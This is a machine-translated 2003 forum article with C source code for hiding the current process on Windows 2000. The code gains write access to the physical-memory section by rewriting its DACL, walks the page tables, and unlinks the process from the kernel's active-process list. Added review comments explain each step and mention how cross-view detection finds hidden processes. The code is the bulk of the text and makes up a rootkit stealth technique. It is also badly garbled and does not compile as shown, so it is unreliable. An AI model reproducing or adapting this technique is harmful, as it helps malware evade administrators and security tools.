A way to hide a process under Windows 2000
Creation time: 2003-09-15
Article attribute: original
Article submission: PJF_ (PJF_AT_USTC.EDU)
I mentioned this last time and thought it was so simple that nothing more needed saying, but someone asked me to write it up, so here are a few more words:
Many posts have analyzed this matter, using API hooks, system service hooks and so on, so that the process does not show up in a remote thread; but that is not really "hidden".
Here is a method for hiding a process completely under 2000; it is very simple and contains no new idea.
Before the explanation, a few structures: the process executive block contains several process-related linked lists, one of which is the active process list. One important use of this list is that the system-information query walks it to enumerate the currently active processes; what is interesting is that M$, perhaps for efficiency reasons, keeps it out of the process kernel block's core operations — thread switching and the like do not use it — so rewriting it causes no problem that cannot be ignored (this is the foundation of this program).
What to do is then obvious: remove the process you want to hide from the doubly-linked active process list, and neither the system nor a kernel debugger (such as Softice / Proc) can find it.
The code for hiding the current process under 2000 is as follows:
#include
#include
#include
/* Native-API (ntdll) macros and structures that the Win2000 SDK did not
   publish, redeclared here by hand. The whole listing is machine-translated:
   identifier case is randomised, some operators and parentheses are lost, and
   the three #include lines above have lost their header names, so the text
   does not compile as shown. The intent of the macro below is the usual
   NT_SUCCESS(status): a non-negative NTSTATUS means success. */
#define nt_success (status) (status)> = 0)
/* STATUS_INFO_LENGTH_MISMATCH is declared but never referenced in this listing;
   STATUS_ACCESS_DENIED is what OpenPhysicalMemory tests for on its first open. */
#DEFINE STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L)
#define status_access_denied ((ntstatus) 0xc0000022L)
TypedEf long NTSTATUS;
/* IO_STATUS_BLOCK: declared for completeness; nothing below uses it. */
Typedef struct _io_status_block
{
NTSTATUS STATUS;
Ulong information;
} }_Status_block, * pio_status_block;
/* UNICODE_STRING: counted wide-character string; used for the section's
   object name passed to ZwOpenSection. */
Typedef struct _unicate_string
{
Ushort Length;
Ushort maximumlength;
PWSTR BUFFER;
} Unicode_string, * punicode_string;
/* OBJ_* attribute flags: declared but not used below (OpenPhysicalMemory
   sets Attributes to 0). */
#define obj_inherit 0x00000002L
#define obj_pers_Permanent 0x00000010L
#define obj_exclusive 0x00000020L
#define obj_case_insensitive 0x00000040L
#define obj_openif 0x00000080L
#define obj_openlink 0x00000100L
#define obj_kernel_handle 0x00000200L
#define obj_valid_attributes 0x000003F2L
/* OBJECT_ATTRIBUTES: third argument of ZwOpenSection. OpenPhysicalMemory fills
   Length and ObjectName and leaves every other field NULL/0. */
Typedef struct _object_attributes
{
Ulong Length;
Handle rootdirectory;
Punicode_String ObjectName;
Ulong attributes;
PVOID SecurityDescriptor;
Pvoid SecurityQualityOfService;
} Object_attributes, * pobject_attribute;
/* Function-pointer types for the two ntdll exports resolved at run time with
   GetProcAddress (ZwOpenSection and RtlInitUnicodeString). The typedef name
   is inconsistent after translation ("ZWopense" here, "Zwopensection" where
   it is used), and the parameter type on the RtlInitUnicodeString line has
   been mangled into "dstinationstring". */
TypeDef NTSTATUS (Callback * ZWopense) (
Out phandle sectionhandle,
IN Access_mask desidaccess,
In POBJECT_ATTRIBUTES OBJECTATTRIBUTES
);
TypeDef void (Callback * RTLinitunicodeString) (in out dstinationstring,
In Pcwstr SourceString
);
/* Resolved entry points (the variable and its typedef share a name after
   translation, which is a redeclaration error as written). */
RTLinitunicodeString RTLinitunicodeString;
Zwopensection Zwopense;
/* Globals: the ntdll module handle, the mapped view of the page at physical
   offset 0x30000 (assumed to be the page directory, see the closing note),
   and the PhysicalMemory section handle. */
HModule g_hntdll = null;
PVOID G_PMAPPHYSICALMORY = NULL;
Handle g_hmpm = NULL;
/* Loads ntdll.dll and resolves the two native exports the rest of the listing
   needs. Returns FALSE only if LoadLibrary fails; the two GetProcAddress
   results are stored without a NULL check, so a failed lookup would surface
   later as a call through a NULL function pointer. Identifier case is mangled
   by the translation ("initntll" here vs "initntdll" at the call site,
   "loadingLibrary" for LoadLibrary). */
BOOL initntll ()
{
g_hntdll = loadingLibrary ("ntdll.dll");
IF (! g_hntdll)
{
Return False;
}
/* Neither lookup result is validated. */
RTLINITUNICODESTRING =
(RTLinitunicodeString) GetProcaddress (g_hntdll, "rtLinitUnicodestring");
Zwopensection =
(Zwopensection) GetProcaddress (g_hntdll, "zwopensection");
Return True;
}
/* Releases the ntdll module handle acquired by InitNtdll, if any. The global
   is not reset to NULL afterwards, so a second call would FreeLibrary a stale
   handle. */
Void Closentdll ()
{
IF (g_hntdll! = null)
{
Freelibrary (g_hntdll);
}
}
/* Rewrites the DACL of the given section handle so that the caller gains
   SECTION_MAP_WRITE: reads the current DACL (GetSecurityInfo), builds one
   GRANT_ACCESS entry for the TRUSTEE_IS_NAME trustee named by the string
   literal below (lower-cased here by the translation) and merges it
   (SetEntriesInAcl), then writes the result back (SetSecurityInfo).
   OpenPhysicalMemory reopens the section with READ_CONTROL | WRITE_DAC
   before calling here. Failures are not reported to the caller: each step
   just jumps to cleanup, and DWRES is never read after being assigned.
   PSD and PNEWDACL are LocalFree'd; PDACL is presumably a pointer into PSD
   (as GetSecurityInfo documents) and so needs no separate free — confirm.
   The three condition lines are garbled: the "!= ERROR_SUCCESS" comparison
   sits outside the assignment's parentheses and closing parens are missing.
   NOTE(review): this DACL rewrite on the PhysicalMemory section is the step
   that later Windows releases closed by removing user-mode access to the
   section altogether; the listing is Windows 2000 specific. */
Void SetPhyscialMemorysectionCanbewrite (Handle Hsection)
{
PACL PDACL = NULL;
PACL PNEWDACL = NULL;
PSecurity_Descriptor PSD = NULL;
DWORD DWRES;
EXPLICIT_ACCESS EA;
/* Fetch the existing DACL so the new ACE is added to it rather than replacing it. */
IF (dwres = getsecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION,
NULL, NULL, & PDACL, NULL, & PSD)! = Error_Success
{
Goto cleanup;
}
ZeromeMory (& EA, SIZEOF (EXPLICIT_ACCESS));
Ea.grfaccesspermissions = section_map_write;
Ea.grfaccessmode = GRANT_ACCESS;
Ea.grfinheritance = no_inheritance;
Ea.trustee.trusteeform = trustee_is_name;
EA.TRUSTEE.TRUSTEETEETYPE = trustee_is_user;
Ea.trustee.ptStrName = "current_user";
IF (dwres = setENTRIESINACL (1, & EA, PDACL, & PNEWDACL)! = Error_Success)
{
Goto cleanup;
}
IF (dwres = setsecurityInfo (hsection, se_kernel_object, dacl_security_information, null, null, pnewdacl, null)! = error_success
{
Goto cleanup;
}
Cleanup:
IF (PSD)
Localfree (PSD);
IF (PNewDACL)
LocalFree (PNewDACL);
}
/* Opens the PhysicalMemory section object (the path literal below has had its
   backslashes turned into slashes and lost its closing quote in translation)
   for read+write mapping. If that open is denied, it reopens the section with
   READ_CONTROL | WRITE_DAC, grants itself SECTION_MAP_WRITE through
   SetPhyscialMemorysectionCanbewrite, closes that handle and opens again. On
   success it maps one 0x1000-byte view at physical offset 0x30000 into
   g_pMapPhysicalMemory (the article assumes this page is the page directory)
   and returns the section handle; returns NULL on failure.
   Visible quirks: the status of the READ_CONTROL | WRITE_DAC open is not
   checked before the DACL call; the retry ORs SECTION_MAP_WRITE with itself
   whereas the first open asked for READ | WRITE; when MapViewOfFile fails the
   section handle in g_hmpm is not closed. The "4" passed as the view's
   desired access is presumably FILE_MAP_READ (which has that value). The
   MapViewOfFile call has lost its opening parenthesis, and "status" is
   declared as STATUS. */
Handle OpenPhysicalMemory ()
{
NTSTATUS STATUS;
Unicode_String PhysmemString; Object_Attributes attribute;
RTLinitunicodeString (& PhysmemString, L "// device // physicalmemory);
Attributes.Length = sizeof (Object_attributes);
Attributes.rootdirectory = NULL;
Attributes.Objectname = & physmemstring;
Attributes.attributes = 0;
Attributes.securityDescriptor = null;
Attributes.securityqualityofservice = null;
Status = zwopensection (& g_hmpm, section_map_read | section_map_write, & attributes);
/* Access denied: take WRITE_DAC, widen the DACL, then try the mapping open again. */
IF (status == status_access_denied) {
Status = zwopensection (& g_hmpm, read_control | write_dac, & attributes);
SetPhyscialMemorySectionCanbewrite (g_hmpm);
CloseHandle (G_HMPM);
Status = zwopensection (& g_hmpm, section_map_write | section_map_write, & attributes);
}
IF (! NT_Success (status))
{
Return NULL;
}
/* One page at physical 0x30000; g_hmpm stays open (and leaks) if this fails. */
g_pmapphysicalmemory = mappviewoffile
g_hmpm,
4,
0,
0x30000,
0x1000);
IF (g_pmapphysicalmemory == null)
{
Return NULL;
}
Return G_HMPM;
}
/* Translates a virtual address to a physical address by walking the 32-bit
   x86 two-level page tables (10/10/12 split, i.e. non-PAE) through the
   physical-memory section. BaseAddress is the mapped page directory, indexed
   by bits 31..22 of the address. If the directory entry's present bit (bit 0)
   is clear the function returns 0. If bit 7 (large page) is set, the result
   is formed from the entry's upper bits and the low 22 bits of the address;
   otherwise the page-table page named by the entry is mapped from the
   section, the entry at bits 21..12 is read, its present bit checked, and the
   page frame combined with the low 12 bits of the address; the table view is
   unmapped on the present path only (it leaks on the not-present path).
   Returns 0 when either level is not present, so 0 is ambiguous with a real
   physical address of 0. The text is garbled: the bitwise OR between the two
   halves of each PADDR expression and the ";" on the declaration line are
   missing, and several hex masks have lost or gained digits. */
Pvoid LineArtophys (Pulong Baseaddress, Pvoid Addr)
{
Ulong Vaddr = (Ulong) Addr, PGDE, PTE, PADDR
PGDE = BaseAddress [VADDR >> 22];
IF ((pgde & 1)! = 0)
{
/* Bit 7 of a directory entry marks a large (4 MiB) page: no second level. */
Ulong TMP = PGDE & 0x00000080;
IF (TMP! = 0)
{
Paddr = (PGDE & 0xFFC00000) (VADDR & 0x003FFFF);
}
Else
{
/* Map the page table page and index it with the middle 10 bits. */
PGDE = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000);
PTE = ((pulong) PGDE [(VADDR & 0x003FF000) >> 12];
IF ((PTE & 1)! = 0)
{
PADDR = (PTE & 0xFfffff000) (VADDR & 0x00000FFF);
UNMAPVIEWOFFILE ((pvoid) PGDE;
}
Else Return 0;
}
}
Else Return 0;
Return (PVOID) PADDR;
}
/* Reads one 32-bit value at a virtual address through physical memory:
   translates with LineArtophys (using the mapped page directory), maps the
   0x1000-byte page containing the result, and returns the dword at the page
   offset. Returns 0 if MapViewOfFile fails, so 0 is ambiguous with a genuine
   zero. A failed translation (phys == 0) is not detected: the page at
   physical offset 0 is mapped and read instead. The LineArtophys call is
   missing a closing parenthesis and the "if" has been fused onto the
   MapViewOfFile line by the translation. */
Ulong getData (PVOID ADDR)
{
Ulong phys = (ulong) lineartophys ((pulong) g_pmapphysicalmemory, (pvoid) addr;
Pulong TMP = (Pulong) MapViewOffile (g_hmpm, 4, 0, phys & 0xffff000, 0x1000); if (TMP == 0)
Return 0;
/* Dword index within the page. */
Ulong Ret = TMP [(Phys & 0xFFF) >> 2];
UnmapViewoffile (TMP);
Return Ret;
}
/* Writes one 32-bit value at a virtual address through physical memory; the
   write-side mirror of getData, mapping the page with FILE_MAP_WRITE. Returns
   FALSE only if the view mapping fails. As in getData, a failed translation
   (phys == 0) is not detected and the write would land in the page at
   physical offset 0. The LineArtophys call is missing a closing parenthesis. */
Bool SetData (PVOID ADDR, ULONG DATA)
{
Ulong phys = (ulong) lineartophys ((pulong) g_pmapphysicalmemory, (pvoid) addr;
Pulong TMP = (Pulong) MapViewOffile (g_hmpm, file_map_write, 0, phys & 0xffff000, 0x1000);
IF (TMP == 0)
Return False;
TMP [(Phys & 0xFFF) >> 2] = DATA;
UnmapViewoffile (TMP);
Return True;
}
/* Unlinks the calling process from the kernel's active-process list by
   direct physical-memory writes (direct kernel object manipulation), using
   getData/SetData: read a thread pointer from the hard-coded address
   0xFFDFF124 (presumably the current-thread slot of the processor control
   region on Win2000 x86), read the owning process from thread+0x22C, read the
   forward (+0xA0) and backward (+0xA4) links of the process's list entry, and
   point the two neighbours at each other. The process's own link fields are
   left untouched. All offsets are Windows 2000 specific (the closing note
   says other versions need different offsets).
   Control-flow quirks as written: when initntdll fails the function still
   returns TRUE (only the OpenPhysicalMemory failure returns FALSE); the
   mapped view in g_pmapphysicalmemory is never unmapped; the "if (" before
   OpenPhysicalMemory and the "+" operators inside the PVOID(...) casts are
   lost in translation.
   NOTE(review): only this one list is edited; every other kernel structure
   that references the process (its threads, its handle table, the process
   object itself still resident in memory) is untouched, which is what
   cross-view detection of hidden processes relies on. */
Bool hideprocessatall ()
{
IF (initntdll ())
{
Openphysicalmemory () == 0)
{
Return False;
}
Ulong thread = getData ((pvoid) 0xffdff124);
Ulong process = getData (pvoid (thread 0x22c));
/* fw/bw: forward and backward links of this process's list entry. */
Ulong fw = getdata (PVOID (Process 0xA0)), BW = getData (PVOID (Process 0xA4));
/* Predecessor's forward link -> successor; successor's backward link -> predecessor. */
SetData (PVOID (FW 4), BW);
SetDATA (PVOID (BW), FW);
CloseHandle (G_HMPM);
Closentdll ();
}
Return True;
}
Call HideProcessAtAll to hide the current process. If you run it while hiding, the head of the active process list gets modified as well, and after it has run for a while there may be some small problems; how to solve them is left as "after-class exercises" ^_^
Note that the code assumes by default that physical address 0x30000 is the page directory; that holds in most cases, but there are exceptions! How to handle them: "..."
Enough talk.
With slightly changed offsets it can be ported to NT / XP / 2003.